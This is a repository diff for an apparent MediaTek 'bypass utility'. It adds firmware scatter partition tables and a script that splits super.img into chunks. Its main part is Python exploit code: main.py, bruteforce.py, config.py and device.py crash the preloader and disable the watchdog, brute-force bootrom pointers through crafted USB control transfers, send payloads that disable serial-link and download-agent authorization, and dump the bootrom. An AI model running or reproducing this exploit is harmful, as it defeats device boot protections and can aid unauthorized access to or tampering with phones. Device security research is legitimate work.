+  partition_name: gz2
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x1a300000
+  physical_start_addr: 0x1a300000
+  partition_size: 0x1000000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS26
+  partition_name: nvram
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x1b300000
+  physical_start_addr: 0x1b300000
+  partition_size: 0x4000000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: BINREGION
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS27
+  partition_name: lk
+  file_name: lk.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x1f300000
+  physical_start_addr: 0x1f300000
+  partition_size: 0x100000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: true
+  reserve: 0x00
+- partition_index: SYS28
+  partition_name: lk2
+  file_name: lk.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x1f400000
+  physical_start_addr: 0x1f400000
+  partition_size: 0x100000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS29
+  partition_name: boot
+  file_name: boot.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x1f500000
+  physical_start_addr: 0x1f500000
+  partition_size: 0x2000000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS30
+  partition_name: logo
+  file_name: logo.bin
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x21500000
+  physical_start_addr: 0x21500000
+  partition_size: 0x800000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: false
+  empty_boot_needed: true
+  reserve: 0x00
+- partition_index: SYS31
+  partition_name: dtbo
+  file_name: dtbo.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x21d00000
+  physical_start_addr: 0x21d00000
+  partition_size: 0x800000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS32
+  partition_name: tee1
+  file_name: tee.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x22500000
+  physical_start_addr: 0x22500000
+  partition_size: 0x500000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: true
+  reserve: 0x00
+- partition_index: SYS33
+  partition_name: tee2
+  file_name: tee.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x22a00000
+  physical_start_addr: 0x22a00000
+  partition_size: 0x500000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS34
+  partition_name: vbmeta
+  file_name: vbmeta.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x22f00000
+  physical_start_addr: 0x22f00000
+  partition_size: 0x800000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS35
+  partition_name: vbmeta_system
+  file_name: vbmeta_system.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x23700000
+  physical_start_addr: 0x23700000
+  partition_size: 0x800000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS36
+  partition_name: vbmeta_vendor
+  file_name: vbmeta_vendor.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x23f00000
+  physical_start_addr: 0x23f00000
+  partition_size: 0x900000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS37
+  partition_name: super
+  file_name: super.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x24800000
+  physical_start_addr: 0x24800000
+  partition_size: 0x17b000000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS38
+  partition_name: cache
+  file_name: cache.img
+  is_download: true
+  type: EXT4_IMG
+  linear_start_addr: 0x19f800000
+  physical_start_addr: 0x19f800000
+  partition_size: 0x12c00000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS39
+  partition_name: tranfs
+  file_name: tranfs.img
+  is_download: true
+  type: EXT4_IMG
+  linear_start_addr: 0x1b2400000
+  physical_start_addr: 0x1b2400000
+  partition_size: 0x12c00000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS40
+  partition_name: userdata
+  file_name: userdata.img
+  is_download: true
+  type: EXT4_IMG
+  linear_start_addr: 0x1c5000000
+  physical_start_addr: 0x1c5000000
+  partition_size: 0xc0000000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS41
+  partition_name: otp
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0xFFFF01d8
+  physical_start_addr: 0xFFFF01d8
+  partition_size: 0x2b00000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: false
+  is_reserved: true
+  operation_type: RESERVED
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS42
+  partition_name: flashinfo
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0xFFFF0080
+  physical_start_addr: 0xFFFF0080
+  partition_size: 0x1000000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: false
+  is_reserved: true
+  operation_type: RESERVED
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS43
+  partition_name: sgpt
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0xFFFF0000
+  physical_start_addr: 0xFFFF0000
+  partition_size: 0x4200
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: false
+  is_reserved: true
+  operation_type: RESERVED
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00

firmware-tweaks/scatter_split.txt ADDED Viewed

	@@ -0,0 +1,169 @@

+- partition_index: SYS37
+  partition_name: super_1
+  file_name: super_1.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x24800000
+  physical_start_addr: 0x24800000
+  partition_size: 0x1f400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS37
+  partition_name: super_2
+  file_name: super_2.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x43c00000
+  physical_start_addr: 0x43c00000
+  partition_size: 0x1f400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS37
+  partition_name: super_3
+  file_name: super_3.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x63000000
+  physical_start_addr: 0x63000000
+  partition_size: 0x1f400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS37
+  partition_name: super_4
+  file_name: super_4.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x82400000
+  physical_start_addr: 0x82400000
+  partition_size: 0x1f400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS37
+  partition_name: super_5
+  file_name: super_5.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0xa1800000
+  physical_start_addr: 0xa1800000
+  partition_size: 0x1f400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS37
+  partition_name: super_6
+  file_name: super_6.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0xc0c00000
+  physical_start_addr: 0xc0c00000
+  partition_size: 0x1f400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS37
+  partition_name: super_7
+  file_name: super_7.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0xe0000000
+  physical_start_addr: 0xe0000000
+  partition_size: 0x1f400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS37
+  partition_name: super_8
+  file_name: super_8.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0xff400000
+  physical_start_addr: 0xff400000
+  partition_size: 0x1f400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS37
+  partition_name: super_9
+  file_name: super_9.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x11e800000
+  physical_start_addr: 0x11e800000
+  partition_size: 0x1f400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS37
+  partition_name: super_10
+  file_name: super_10.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x13dc00000
+  physical_start_addr: 0x13dc00000
+  partition_size: 0x3d400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00

firmware-tweaks/split.py ADDED Viewed

	@@ -0,0 +1,95 @@

+import os
+import sys
+def hex2decimal(hex_str):
+    """Convert hex string to decimal."""
+    return int(hex_str, 16)
+def bytes2megabytes(byte_size):
+    """Convert bytes to megabytes."""
+    return byte_size / (1024 * 1024)
+PARTITION_TEMPLATE = """
+- partition_index: SYS{partition_index}
+  partition_name: {partition_name}
+  file_name: {file_name}
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: {linear_start_addr}
+  physical_start_addr: {physical_start_addr}
+  partition_size: {partition_size}
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00"""
+# File settings
+BASE_LINEAR_ADDR = 0x24800000 # from scatter file
+BASE_PHYSICAL_ADDR = 0x24800000 # from scatter file
+CHUNK_SIZE = 500 * 1024 * 1024  # 500 MB
+PARTITION_SIZE = 0x17b000000  # from scatter file
+input_file = r"C:\Users\Alpha\Desktop\X688B-H659ABCEFGHI-Q-GL-210813V464\super.img"
+total_partition_size = PARTITION_SIZE
+total_chunk_size = 0
+# Split the file
+file_size = os.path.getsize(input_file)
+# Test calculations
+print(f"Total Partition Size: {total_partition_size} bytes")
+print(f"File Size       : {file_size} bytes")
+print(f"Chunk Size      : {CHUNK_SIZE} bytes")
+if file_size > total_partition_size:
+    print(f"Error: File size {bytes2megabytes(file_size)} MB exceeds partition size {bytes2megabytes(total_partition_size)} MB.")
+    exit(1)
+if file_size < CHUNK_SIZE:
+    print(f"Error: File size {bytes2megabytes(file_size)} MB is less than chunk size {bytes2megabytes(CHUNK_SIZE)} MB.")
+    exit(1)
+if file_size > total_partition_size:
+    print(f"Error: File size {bytes2megabytes(file_size)} MB exceeds total partition size {bytes2megabytes(total_partition_size)} MB.")
+    exit(1)
+chunks = (file_size + CHUNK_SIZE - 1) // CHUNK_SIZE  # Ceiling division
+print('number of chunks:', chunks)
+# exit(0)
+# Split the file into chunks and save them
+with open(input_file, "rb") as f:
+    for i in range(chunks):
+        chunk_file = f"super_{i+1}.img"
+        current_chunk_size = min(CHUNK_SIZE, file_size - (i * CHUNK_SIZE))  # Adjust last chunk
+        with open(chunk_file, "wb") as out:
+            out.write(f.read(current_chunk_size))  # Write the current chunk to a file
+        print(f"Chunk {i+1} saved as {chunk_file} with size {current_chunk_size} bytes.")
+# Generate scatter file content
+scatter_lines = []
+for i in range(chunks):
+    chunk_linear_addr = BASE_LINEAR_ADDR + (i * CHUNK_SIZE)
+    current_chunk_size = min(CHUNK_SIZE, file_size - (i * CHUNK_SIZE))  # Adjust last chunk
+    current_partition_size = current_chunk_size if i != chunks - 1 else total_partition_size - chunk_linear_addr # Adjust last partition size
+    partition_image=f"super_{i+1}.img"
+    partition_info = PARTITION_TEMPLATE.format(
+        partition_index=37,
+        partition_name=partition_image.split('.')[0],
+        file_name=partition_image,
+        linear_start_addr=hex(chunk_linear_addr),
+        physical_start_addr=hex(chunk_linear_addr),
+        partition_size=hex(current_partition_size)
+    )
+    scatter_lines.append(partition_info)
+    total_chunk_size += current_chunk_size
+assert total_chunk_size == file_size, f"Total chunk size ({total_chunk_size}) does not match file size ({file_size})."
+assert BASE_LINEAR_ADDR + total_chunk_size <= total_partition_size, "Total chunk size exceeds partition size."
+# Write scatter file
+with open("scatter_split.txt", "w") as f:
+    scatter_content = "\n".join(scatter_lines)
+    f.write(scatter_content)
+print(f"Split into {chunks} files, scatter file 'scatter_split.txt' generated.")

firmware-tweaks/utils.py ADDED Viewed

	@@ -0,0 +1,56 @@

+import os
+import hashlib
+def file_size(file_path):
+    """Returns the size of the file in bytes."""
+    if not os.path.isfile(file_path):
+        raise FileNotFoundError(f"{file_path} does not exist or is not a file.")
+    file_size = os.path.getsize(file_path)
+    file_size_mb = file_size / (1024 * 1024)  # Convert bytes to MB
+    return f"{file_size_mb:.2f} MB"
+def hash_file(filename):
+    """This function returns the SHA-1 hash of the file passed into it"""
+    # make a hash object
+    h = hashlib.sha256()
+    # open file for reading in binary mode
+    with open(filename,'rb') as file:
+        # loop till the end of the file
+        chunk = 0
+        while chunk != b'':
+            # read only 1024 bytes at a time
+            chunk = file.read(1024)
+            h.update(chunk)
+    return h.hexdigest()
+def compare_files(file1, file2):
+    """Compares two files and returns True if they are identical, False otherwise."""
+    if not os.path.exists(file1) or not os.path.exists(file2):
+        raise FileNotFoundError("One or both files do not exist.")
+    file1_size = os.path.getsize(file1)
+    file2_size = os.path.getsize(file2)
+    if file1_size != file2_size:
+        print(f"Files {file1} and {file2} are different sizes: {file1_size} bytes vs {file2_size} bytes.")
+        return False
+    # Calculate hashes for both files
+    hash1 = hash_file(file1)
+    hash2 = hash_file(file2)
+    # Compare the hashes
+    is_identical = hash1 == hash2
+    if is_identical:
+        print(f"Files {file1} and {file2} are identical.")
+    else:
+        print(f"Files {file1} and {file2} are different.")
+    return is_identical
+def strip_r_padding(file_path):
+    """Strips the trailing null bytes from a binary file and saves it with a new name."""
+    filename = os.path.basename(file_path)
+    output_path = os.path.join(os.path.dirname(file_path), f"rstripped_{filename}")
+    with open(file_path, 'rb') as f:
+        data = f.read().rstrip(b'\x00')
+    with open(output_path, 'wb') as f:
+        f.write(data)

hf_upload.bash ADDED Viewed

	@@ -0,0 +1 @@


1	+ huggingface-cli upload sam749/mtk-bypass-utility ./ ./ --exclude "src/__pycache__/*" --token

libusb-1.0.dll ADDED Viewed

	@@ -0,0 +1,3 @@

+version https://git-lfs.github.com/spec/v1
+oid sha256:6b24b0ee1a59cbae385dd15b06eddf2c72b2ff3a875ae279883a880136c59ec8
+size 166912

main.py ADDED Viewed

	@@ -0,0 +1,237 @@

+#!/bin/python3
+from src.exploit import exploit
+from src.common import from_bytes, to_bytes
+from src.config import Config
+from src.device import Device
+from src.logger import log
+from src.bruteforce import bruteforce
+import argparse
+import os
+DEFAULT_CONFIG = "exploits_collection/default_config.json5"
+PAYLOAD_DIR = "exploits_collection/payloads/"
+DEFAULT_PAYLOAD = "generic_dump_payload.bin"
+DEFAULT_DA_ADDRESS = 0x200D00
+def main():
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-c", "--config", help="Device config")
+    parser.add_argument("-t", "--test", help="Testmode", const="0x9900", nargs='?')
+    parser.add_argument("-w", "--watchdog", help="Watchdog address(in hex)")
+    parser.add_argument("-u", "--uart", help="UART base address(in hex)")
+    parser.add_argument("-v", "--var_1", help="var_1 value(in hex)")
+    parser.add_argument("-a", "--payload_address", help="payload_address value(in hex)")
+    parser.add_argument("-p", "--payload", help="Payload to use")
+    parser.add_argument("-f", "--force", help="Force exploit on insecure device", action="store_true")
+    parser.add_argument("-n", "--no_handshake", help="Skip handshake", action="store_true")
+    parser.add_argument("-m", "--crash_method", help="Method to use for crashing preloader (0, 1, 2)", type=int)
+    parser.add_argument("-k", "--kamakiri", help="Force use of kamakiri", action="store_true")
+    arguments = parser.parse_args()
+    if arguments.config:
+        if not os.path.exists(arguments.config):
+            raise RuntimeError("Config file {} doesn't exist".format(arguments.config))
+    elif not os.path.exists(DEFAULT_CONFIG):
+        raise RuntimeError("Default config is missing")
+    device = Device().find()
+    config, serial_link_authorization, download_agent_authorization, hw_code  = get_device_info(device, arguments)
+    while device.preloader:
+        device = crash_preloader(device, config)
+        config, serial_link_authorization, download_agent_authorization, hw_code  = get_device_info(device, arguments)
+    log("Disabling watchdog timer")
+    device.write32(config.watchdog_address, 0x22000064)
+    if device.libusb0:
+        arguments.kamakiri = True
+    bootrom__name = "bootrom_" + hex(hw_code)[2:] + ".bin"
+    if arguments.test and not arguments.kamakiri:
+        dump_ptr = int(arguments.test, 16)
+        found = False
+        while not found:
+            log("Test mode, testing " + hex(dump_ptr) + "...")
+            found, dump_ptr = bruteforce(device, config, dump_ptr)
+            device.dev.close()
+            reconnect_message()
+            device = Device().find(wait=True)
+            device.handshake()
+            while device.preloader:
+                device = crash_preloader(device, config)
+                device.handshake()
+        log("Found " + hex(dump_ptr) + ", dumping bootrom to {}".format(bootrom__name))
+        open(bootrom__name, "wb").write(bruteforce(device, config, dump_ptr, True))
+        exit(0)
+    if serial_link_authorization or download_agent_authorization or arguments.force:
+        log("Disabling protection")
+        payload = prepare_payload(config)
+        result = exploit(device, config, payload, arguments)
+        if arguments.test:
+            while not result:
+                device.dev.close()
+                config.var_1 += 1
+                log("Test mode, testing " + hex(config.var_1) + "...")
+                reconnect_message()
+                device = Device().find(wait=True)
+                device.handshake()
+                while device.preloader:
+                    device = crash_preloader(device, config)
+                    device.handshake()
+                result = exploit(device, config, payload, arguments)
+    else:
+        log("Insecure device, sending payload using send_da")
+        if not arguments.payload:
+            config.payload = DEFAULT_PAYLOAD
+        if not arguments.payload_address:
+            config.payload_address = DEFAULT_DA_ADDRESS
+        payload = prepare_payload(config)
+        payload += b'\x00' * 0x100
+        device.send_da(config.payload_address, len(payload), 0x100, payload)
+        device.jump_da(config.payload_address)
+        result = device.read(4)
+    if result == to_bytes(0xA1A2A3A4, 4):
+        log("Protection disabled")
+    elif result == to_bytes(0xC1C2C3C4, 4):
+        dump_brom(device, bootrom__name)
+    elif result == to_bytes(0x0000C1C2, 4) and device.read(4) == to_bytes(0xC1C2C3C4, 4):
+        dump_brom(device, bootrom__name, True)
+    elif result != b'':
+        raise RuntimeError("Unexpected result {}".format(result.hex()))
+    else:
+        log("Payload did not reply")
+    device.close()
+def reconnect_message():
+    print("")
+    print("Please reconnect device in bootrom mode")
+    print("")
+def dump_brom(device, bootrom__name, word_mode=False):
+    log("Found send_dword, dumping bootrom to {}".format(bootrom__name))
+    with open(bootrom__name, "wb") as bootrom:
+        if word_mode:
+            for i in range(0x20000 // 4):
+                device.read(4)  # discard garbage
+                bootrom.write(device.read(4))
+        else:
+            bootrom.write(device.read(0x20000))
+def prepare_payload(config):
+    with open(PAYLOAD_DIR + config.payload, "rb") as payload:
+        payload = payload.read()
+    # replace watchdog_address and uart_base in generic payload
+    payload = bytearray(payload)
+    if from_bytes(payload[-4:], 4, '<') == 0x10007000:
+        payload[-4:] = to_bytes(config.watchdog_address, 4, '<')
+    if from_bytes(payload[-8:][:4], 4, '<') == 0x11002000:
+        payload[-8:] = to_bytes(config.uart_base, 4, '<') + payload[-4:]
+    payload = bytes(payload)
+    while len(payload) % 4 != 0:
+        payload += to_bytes(0)
+    return payload
+def get_device_info(device, arguments):
+    if not arguments.no_handshake:
+        device.handshake()
+    hw_code = device.get_hw_code()
+    hw_sub_code, hw_ver, sw_ver = device.get_hw_dict()
+    secure_boot, serial_link_authorization, download_agent_authorization = device.get_target_config()
+    if arguments.config:
+        config_file = open(arguments.config)
+        config = Config().from_file(config_file, hw_code)
+        config_file.close()
+    else:
+        try:
+            config = Config().default(hw_code)
+        except NotImplementedError as e:
+            if arguments.test:
+                config = Config()
+                log(e)
+            else:
+                raise e
+    if arguments.test:
+        config.payload = DEFAULT_PAYLOAD
+    if arguments.var_1:
+        config.var_1 = int(arguments.var_1, 16)
+    if arguments.watchdog:
+        config.watchdog_address = int(arguments.watchdog, 16)
+    if arguments.uart:
+        config.uart_base = int(arguments.uart, 16)
+    if arguments.payload_address:
+        config.payload_address = int(arguments.payload_address, 16)
+    if arguments.payload:
+        config.payload = arguments.payload
+    if arguments.crash_method:
+        config.crash_method = arguments.crash_method
+    if not os.path.exists(PAYLOAD_DIR + config.payload):
+        raise RuntimeError("Payload file {} doesn't exist".format(PAYLOAD_DIR + config.payload))
+    print()
+    log("Device hw code: {}".format(hex(hw_code)))
+    log("Device hw sub code: {}".format(hex(hw_sub_code)))
+    log("Device hw version: {}".format(hex(hw_ver)))
+    log("Device sw version: {}".format(hex(sw_ver)))
+    log("Device secure boot: {}".format(secure_boot))
+    log("Device serial link authorization: {}".format(serial_link_authorization))
+    log("Device download agent authorization: {}".format(download_agent_authorization))
+    print()
+    return config, serial_link_authorization, download_agent_authorization, hw_code
+def crash_preloader(device, config):
+    print("")
+    log("Found device in preloader mode, trying to crash...")
+    print("")
+    if config.crash_method == 0:
+        try:
+            payload = b'\x00\x01\x9F\xE5\x10\xFF\x2F\xE1' + b'\x00' * 0x110
+            device.send_da(0, len(payload), 0, payload)
+            device.jump_da(0)
+        except RuntimeError as e:
+            log(e)
+            print("")
+    elif config.crash_method == 1:
+        payload = b'\x00' * 0x100
+        device.send_da(0, len(payload), 0x100, payload)
+        device.jump_da(0)
+    elif config.crash_method == 2:
+        device.read32(0)
+    device.dev.close()
+    device = Device().find()
+    return device
+if __name__ == "__main__":
+    main()

src/bruteforce.py ADDED Viewed

	@@ -0,0 +1,63 @@

+from src.common import to_bytes, from_bytes
+import usb
+import array
+import struct
+def bruteforce(device, config, dump_ptr, dump=False):
+    addr = config.watchdog_address + 0x50
+    # We don't need to wait long, if we succeeded
+    # noinspection PyBroadException
+    try:
+        device.dev.timeout = 1
+    except Exception:
+        pass
+    udev = device.udev
+    try:
+        # noinspection PyProtectedMember
+        udev._ctx.managed_claim_interface = lambda *args, **kwargs: None
+    except AttributeError as e:
+        raise RuntimeError("libusb is not installed for port {}".format(device.dev.port)) from e
+    linecode = udev.ctrl_transfer(0xA1, 0x21, 0, 0, 7) + array.array('B', [0])
+    if dump:
+        try:
+            device.cmd_da(0, 0, 1)
+            device.read32(addr)
+        except:
+            pass
+        for i in range(4):
+            udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(dump_ptr - 6 + (4 - i), 4, '<')))
+            udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9)
+        brom = bytearray(device.cmd_da(0, 0, 0x20000))
+        brom[dump_ptr - 1:] = b"\x00" + to_bytes(0x100030, 4, '<') + brom[dump_ptr + 4:]
+        return brom
+    else:
+        try:
+            device.cmd_da(0, 0, 1)
+            device.read32(addr)
+        except:
+            pass
+        for address in range(dump_ptr, 0xffff, 4):
+            for i in range(3):
+                udev.ctrl_transfer(0x21, 0x20, 0, 0, linecode + array.array('B', to_bytes(address - 5 + (3 - i), 4, '<')))
+                udev.ctrl_transfer(0x80, 0x6, 0x0200, 0, 9)
+            try:
+                if(len(device.cmd_da(0, 0, 0x40))) == 0x40:
+                    return (True, address)
+            except RuntimeError:
+                try:
+                    device.read32(addr)
+                except:
+                    return (False, address + 4)
+            except Exception:
+                return (False, address + 4)

src/common.py ADDED Viewed

	@@ -0,0 +1,21 @@

+import struct
+def raise_(ex):
+    raise ex
+def to_bytes(value, size=1, endian='>'):
+    return {
+        1: lambda: struct.pack(endian + 'B', value),
+        2: lambda: struct.pack(endian + 'H', value),
+        4: lambda: struct.pack(endian + 'I', value)
+    }.get(size, lambda: raise_(RuntimeError("invalid size")))()
+def from_bytes(value, size=1, endian='>'):
+    return {
+        1: lambda: struct.unpack(endian + 'B', value)[0],
+        2: lambda: struct.unpack(endian + 'H', value)[0],
+        4: lambda: struct.unpack(endian + 'I', value)[0]
+    }.get(size, lambda: raise_(RuntimeError("invalid size")))()

src/config.py ADDED Viewed

	@@ -0,0 +1,61 @@

+import json5
+class Config:
+    watchdog_address: int = 0x10007000
+    uart_base: int = 0x11002000
+    payload_address: int = 0x100A00
+    var_0: int = None
+    var_1: int = 0xA
+    payload: str
+    crash_method: int = 0
+    ptr_usbdl: int = None
+    ptr_da: int = None
+    def default(self, hw_code):
+        config = open("default_config.json5")
+        self.from_file(config, hw_code)
+        config.close()
+        return self
+    def from_file(self, config, hw_code):
+        hw_code = hex(hw_code)
+        config = json5.load(config)
+        if hw_code in config:
+            self.from_dict(config[hw_code])
+        else:
+            raise NotImplementedError("Can't find {} hw_code in config".format(hw_code))
+        return self
+    def from_dict(self, entry):
+        if "watchdog_address" in entry:
+            self.watchdog_address = entry["watchdog_address"]
+        if "uart_base" in entry:
+            self.uart_base = entry["uart_base"]
+        if "payload_address" in entry:
+            self.payload_address = entry["payload_address"]
+        if "var_0" in entry:
+            self.var_0 = entry["var_0"]
+        if "var_1" in entry:
+            self.var_1 = entry["var_1"]
+        if "crash_method" in entry:
+            self.crash_method = entry["crash_method"]
+        if "ptr_usbdl" in entry:
+            self.ptr_usbdl = entry["ptr_usbdl"]
+        if "ptr_da" in entry:
+            self.ptr_da = entry["ptr_da"]
+        self.payload = entry["payload"]
+        return self

src/device.py ADDED Viewed

	@@ -0,0 +1,343 @@

+from src.common import to_bytes, from_bytes
+from src.logger import log
+import usb
+import usb.backend.libusb1
+import usb.backend.libusb0
+from ctypes import c_void_p, c_int
+import array
+import os
+import time
+BAUD = 115200
+TIMEOUT = 1
+VID = "0E8D"
+PID = "0003"
+class Device:
+    def __init__(self, port=None):
+        self.udev = None
+        self.dev = None
+        self.rxbuffer = array.array('B')
+        self.preloader = False
+        self.timeout = TIMEOUT
+        self.usbdk = False
+        self.libusb0 = False
+        if os.name == 'nt':
+            try:
+                file_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), "..")
+                try:
+                    os.add_dll_directory(file_dir)
+                except Exception:
+                    pass
+                os.environ['PATH'] = file_dir + ';' + os.environ['PATH']
+            except Exception:
+                pass
+    def find(self, wait=False):
+        if self.dev:
+            raise RuntimeError("Device already found")
+        try:
+            self.backend = usb.backend.libusb1.get_backend(find_library=lambda x: "libusb-1.0.dll")
+            if self.backend:
+                try:
+                    self.backend.lib.libusb_set_option.argtypes = [c_void_p, c_int]
+                    self.backend.lib.libusb_set_option(self.backend.ctx, 1)  # <--- this is the magic call to enable usbdk mode
+                    self.usbdk = True
+                except ValueError:
+                    log("Failed enabling UsbDk mode, please use 64-Bit Python and 64-Bit UsbDk")
+            else:
+                self.backend = usb.backend.libusb1.get_backend()
+        except usb.core.USBError:
+            self.backend = usb.backend.libusb1.get_backend()
+        log("Waiting for device")
+        if wait:
